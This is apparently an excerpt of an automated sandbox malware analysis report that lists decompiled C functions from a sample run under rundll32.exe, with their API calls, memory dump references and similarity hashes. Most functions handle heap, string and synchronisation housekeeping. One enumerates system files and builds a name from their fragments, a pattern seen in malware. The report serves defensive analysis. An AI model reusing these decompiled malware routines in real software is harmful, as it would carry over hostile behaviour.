                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: b83db2a390ac3eb4caa5e574efc7217891c43f2aa9a7147ab627b44af3201878
                                          • Instruction ID: 8b38aeae01c86c183f6e45a15e9f6f5b81030ca7f19a56a104d69d238ea894e9
                                          • Opcode Fuzzy Hash: b83db2a390ac3eb4caa5e574efc7217891c43f2aa9a7147ab627b44af3201878
                                          • Instruction Fuzzy Hash: 25E0E573A053256BD630A9B85C88D4F3AACDBD8254B004866FF0DD7204E620DC1C82B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF78AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF78AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4bfd26c; // 0x3d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4bfd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4bfd26c; // 0x3d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4bfd238; // 0x6ce0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x04bf78ad
                                          0x04bf78b4
                                          0x04bf78fe
                                          0x04bf7900
                                          0x04bf7900
                                          0x04bf78b8
                                          0x04bf78be
                                          0x04bf78c3
                                          0x04bf78c7
                                          0x04bf78cd
                                          0x04bf78d4
                                          0x00000000
                                          0x00000000
                                          0x04bf78d6
                                          0x04bf78db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf78db
                                          0x04bf78dd
                                          0x04bf78e5
                                          0x04bf78e8
                                          0x04bf78e8
                                          0x04bf78ee
                                          0x04bf78f5
                                          0x04bf78f8
                                          0x04bf78f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,04BF6F2D), ref: 04BF78B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04BF78C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 04BF78E8
                                          • HeapDestroy.KERNEL32(06CE0000), ref: 04BF78F8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 7c22495fd2df92332fcbbb461e4493caa4d10c2ddccfbcb6943fb06a8e8c722b
                                          • Instruction ID: 1250507034ba265cf67cabdb92445738605cd0856389b5b1607c35fd89828019
                                          • Opcode Fuzzy Hash: 7c22495fd2df92332fcbbb461e4493caa4d10c2ddccfbcb6943fb06a8e8c722b
                                          • Instruction Fuzzy Hash: B1F0A031A01305A7EB105BBADD48F467BACEB0475071402A2BD0ED3280CF38EC45D6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF4C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E04BF4C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4bfd324; // 0x70d95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4bfd324; // 0x70d95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4bfd030) {
					HeapFree( *0x4bfd238, 0, _t8);
				}
				_t14[1] = E04BF7C75(_v0, _t14);
				_t11 =  *0x4bfd324; // 0x70d95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x04bf4c3a
                                          0x04bf4c3a
                                          0x04bf4c43
                                          0x04bf4c53
                                          0x04bf4c53
                                          0x04bf4c58
                                          0x04bf4c5d
                                          0x00000000
                                          0x00000000
                                          0x04bf4c4d
                                          0x04bf4c4d
                                          0x04bf4c5f
                                          0x04bf4c63
                                          0x04bf4c75
                                          0x04bf4c75
                                          0x04bf4c85
                                          0x04bf4c88
                                          0x04bf4c8d
                                          0x04bf4c91
                                          0x04bf4c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF4C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF4C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF4C75
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF4C91
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 4c2a55fd57b443b968bf97e635fda43427f08c672ab8c1d21b96345f8cd12768
                                          • Instruction ID: bd0284ccb57d36f244bfa44460387ed08f317c1def340f02dd363bb125d8f36b
                                          • Opcode Fuzzy Hash: 4c2a55fd57b443b968bf97e635fda43427f08c672ab8c1d21b96345f8cd12768
                                          • Instruction Fuzzy Hash: A8F0DA716002409BE7109F78EE48F167BE8EB24745B055546FA0ED7250E728EC99DA29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF9B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04BF9B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4bfd324; // 0x70d95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4bfd324; // 0x70d95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4bfd324; // 0x70d95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4bfe845) {
					HeapFree( *0x4bfd238, 0, _t10);
					_t7 =  *0x4bfd324; // 0x70d95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x04bf9b10
                                          0x04bf9b19
                                          0x04bf9b29
                                          0x04bf9b29
                                          0x04bf9b2e
                                          0x04bf9b33
                                          0x00000000
                                          0x00000000
                                          0x04bf9b23
                                          0x04bf9b23
                                          0x04bf9b35
                                          0x04bf9b3a
                                          0x04bf9b3e
                                          0x04bf9b51
                                          0x04bf9b57
                                          0x04bf9b57
                                          0x04bf9b60
                                          0x04bf9b62
                                          0x04bf9b66
                                          0x04bf9b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF9B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF9B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BF9B51
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF9B66
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: b5f3a93a6026a651b36c89cdc70dcb4d2022acb6f15bf2e2f5c2124fb5bd00bb
                                          • Instruction ID: 2e2194bffe17f8723eee8fbc9d80a36b4b8a5a58ca441dbe140ad1fae7090e7e
                                          • Opcode Fuzzy Hash: b5f3a93a6026a651b36c89cdc70dcb4d2022acb6f15bf2e2f5c2124fb5bd00bb
                                          • Instruction Fuzzy Hash: 14F0D4B56002009BEB189F74ED59F253BF9EB18301B05404AEB0ED7691C638EC89CA34
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF6B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04BF6B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04BF58BE(_t2);
				if(_t34 != 0) {
					_t30 = E04BF58BE(_t28);
					if(_t30 == 0) {
						E04BF147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04BFA8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04BFA8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x04bf6b6e
                                          0x04bf6b78
                                          0x04bf6b7a
                                          0x04bf6b80
                                          0x04bf6b80
                                          0x04bf6b89
                                          0x04bf6b8d
                                          0x04bf6b99
                                          0x04bf6b9d
                                          0x04bf6c11
                                          0x04bf6b9f
                                          0x04bf6b9f
                                          0x04bf6ba3
                                          0x04bf6ba8
                                          0x04bf6bad
                                          0x04bf6bc7
                                          0x04bf6bb6
                                          0x04bf6bb6
                                          0x04bf6bba
                                          0x04bf6bbd
                                          0x04bf6bc2
                                          0x04bf6bc2
                                          0x04bf6bcc
                                          0x04bf6bf4
                                          0x04bf6bfa
                                          0x04bf6bfd
                                          0x04bf6bce
                                          0x04bf6bd0
                                          0x04bf6bd8
                                          0x04bf6be3
                                          0x04bf6be8
                                          0x04bf6be8
                                          0x04bf6c04
                                          0x04bf6c0b
                                          0x04bf6c0c
                                          0x04bf6c0c
                                          0x04bf6b9d
                                          0x04bf6c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?,?,00000000), ref: 04BF6B7A
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                            • Part of subcall function 04BFA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04BF6BA8,00000000,00000001,00000001,?,?,04BFA006,?,?,?,?,00000102), ref: 04BFA8E0
                                            • Part of subcall function 04BFA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?,?,00000000,00000000), ref: 04BFA8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?), ref: 04BF6BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6BF4
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 247dd5ff863342da5dbee7bae5ff6220e73ebfc64783c54de8c2eef2610cd68f
                                          • Instruction ID: db489cb13978c57ae45619cc395c07dcd44ec670b2b87c24111867f02c13b955
                                          • Opcode Fuzzy Hash: 247dd5ff863342da5dbee7bae5ff6220e73ebfc64783c54de8c2eef2610cd68f
                                          • Instruction Fuzzy Hash: 7421B771504259BFDB115FB8CC44A9B7FB8EF05384B058095FE4C9B202E775E94A97B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF5FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF5FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04BF58BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x04bf5fe0
                                          0x04bf5fe4
                                          0x04bf5fee
                                          0x04bf5ff3
                                          0x04bf5ff8
                                          0x04bf5ffa
                                          0x04bf6002
                                          0x04bf6007
                                          0x04bf6015
                                          0x04bf601a
                                          0x04bf6024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,070D937C,?,04BF694E,004F0053,070D937C,?,?,?,?,?,?,04BF9C10), ref: 04BF5FDB
                                          • lstrlenW.KERNEL32(04BF694E,?,04BF694E,004F0053,070D937C,?,?,?,?,?,?,04BF9C10), ref: 04BF5FE2
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04BF694E,004F0053,070D937C,?,?,?,?,?,?,04BF9C10), ref: 04BF6002
                                          • memcpy.NTDLL(751469A0,04BF694E,00000002,00000000,004F0053,751469A0,?,?,04BF694E,004F0053,070D937C), ref: 04BF6015
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: e75394299d74dbd8a15937c258270a5c1b3e26f838cced9498f96f0a849d2a48
                                          • Instruction ID: 67b6da31a0e49e696a6fc541a4941602e233a3cc973c5c02545366d900d243f2
                                          • Opcode Fuzzy Hash: e75394299d74dbd8a15937c258270a5c1b3e26f838cced9498f96f0a849d2a48
                                          • Instruction Fuzzy Hash: 38F04F72900118BF9F11DFA8CC85C9F7BACEF182587154462EE08D7201E735EE159BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF9DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04BF5335,616D692F,00000000), ref: 04BF9DFB
                                          • lstrlen.KERNEL32(?), ref: 04BF9E03
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04BF9E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04BF9E25
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 34bea32c75955c5a12639123c89ae1cd6e926d896130878027d253090e808d4f
                                          • Instruction ID: f4dec64824a0ec1e7250a3303b43152c82dbd3f7435d5450d21fe64693304574
                                          • Opcode Fuzzy Hash: 34bea32c75955c5a12639123c89ae1cd6e926d896130878027d253090e808d4f
                                          • Instruction Fuzzy Hash: 1FE01233805625BB87226BB4AC08C4FBFB9FF892507054956FA5893114C735D8158BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 6276 Parent PID: 2880 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 04C032BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E04C032BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x4c0d2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x4c0d238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x4c0d2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x4c0d238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x4c0d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x4c0d2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x4c0d2a4; // 0x97a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x4c0e7e8; // 0x73797325
				_t83 = E04C077E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x4c0d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x4c0d2a4; // 0x97a5a8
				_t16 = _t93 + 0x4c0e809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x04c032c3
                                          0x04c032c9
                                          0x04c032cb
                                          0x04c032e5
                                          0x04c032e7
                                          0x04c032ec
                                          0x04c03561
                                          0x04c03568
                                          0x04c03568
                                          0x04c032f2
                                          0x04c03307
                                          0x04c03309
                                          0x04c0330b
                                          0x04c03310
                                          0x04c03551
                                          0x04c0355b
                                          0x00000000
                                          0x04c0355b
                                          0x04c03316
                                          0x04c03321
                                          0x04c03326
                                          0x04c0332b
                                          0x04c0332e
                                          0x04c03335
                                          0x04c0333a
                                          0x04c0333f
                                          0x04c03541
                                          0x04c0354b
                                          0x00000000
                                          0x04c0354b
                                          0x04c03355
                                          0x04c03359
                                          0x04c0335c
                                          0x04c0335f
                                          0x04c03365
                                          0x04c0336a
                                          0x04c03373
                                          0x04c03379
                                          0x04c03383
                                          0x04c0338a
                                          0x04c0338a
                                          0x04c0339c
                                          0x04c033a7
                                          0x04c033b5
                                          0x04c033ba
                                          0x04c033bf
                                          0x04c033c2
                                          0x04c033c7
                                          0x04c033d1
                                          0x04c033d4
                                          0x04c033d7
                                          0x04c033ed
                                          0x04c033ef
                                          0x04c033f4
                                          0x04c0353f
                                          0x00000000
                                          0x04c0353f
                                          0x04c0340b
                                          0x04c0345c
                                          0x04c0341f
                                          0x04c03427
                                          0x04c0342c
                                          0x04c0343a
                                          0x04c03443
                                          0x04c0344c
                                          0x04c0344c
                                          0x04c0345a
                                          0x04c0345a
                                          0x04c03460
                                          0x04c03464
                                          0x04c03464
                                          0x04c0346a
                                          0x00000000
                                          0x00000000
                                          0x04c0346c
                                          0x04c03472
                                          0x04c03519
                                          0x04c0351c
                                          0x04c03529
                                          0x04c03529
                                          0x04c0352d
                                          0x00000000
                                          0x00000000
                                          0x04c03522
                                          0x04c03526
                                          0x04c03526
                                          0x04c03528
                                          0x04c03528
                                          0x04c03532
                                          0x04c03539
                                          0x04c0353b
                                          0x00000000
                                          0x04c0353b
                                          0x04c03478
                                          0x04c0347a
                                          0x04c0347a
                                          0x04c0348d
                                          0x04c03493
                                          0x04c0349e
                                          0x04c034a0
                                          0x04c034a4
                                          0x04c034a6
                                          0x04c034a6
                                          0x04c034ab
                                          0x04c034ad
                                          0x04c034ad
                                          0x04c034ab
                                          0x04c034b2
                                          0x04c034b6
                                          0x04c034b6
                                          0x04c034c6
                                          0x04c034cb
                                          0x04c034ce
                                          0x04c034ce
                                          0x04c034d1
                                          0x04c034db
                                          0x04c034e3
                                          0x04c034e8
                                          0x04c034f6
                                          0x04c034f6
                                          0x04c0350a
                                          0x04c0350e
                                          0x04c0350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04C032E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04C03307
                                          • memset.NTDLL ref: 04C03321
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04C0333A,73797325), ref: 04C077F7
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04C07811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04C0335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04C03373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04C0338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04C03396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 04C033D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04C033ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 04C0340B
                                          • FindNextFileA.KERNELBASE(04C0207E,?), ref: 04C0341F
                                          • FindClose.KERNEL32(04C0207E), ref: 04C0342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04C03438
                                          • CompareFileTime.KERNEL32(?,?), ref: 04C0345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 04C0348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 04C034C6
                                          • FindNextFileA.KERNELBASE(04C0207E,?), ref: 04C034DB
                                          • FindClose.KERNEL32(04C0207E), ref: 04C034E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04C034F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04C03504
                                          • FindClose.KERNEL32(04C0207E), ref: 04C03539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04C0354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C0355B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
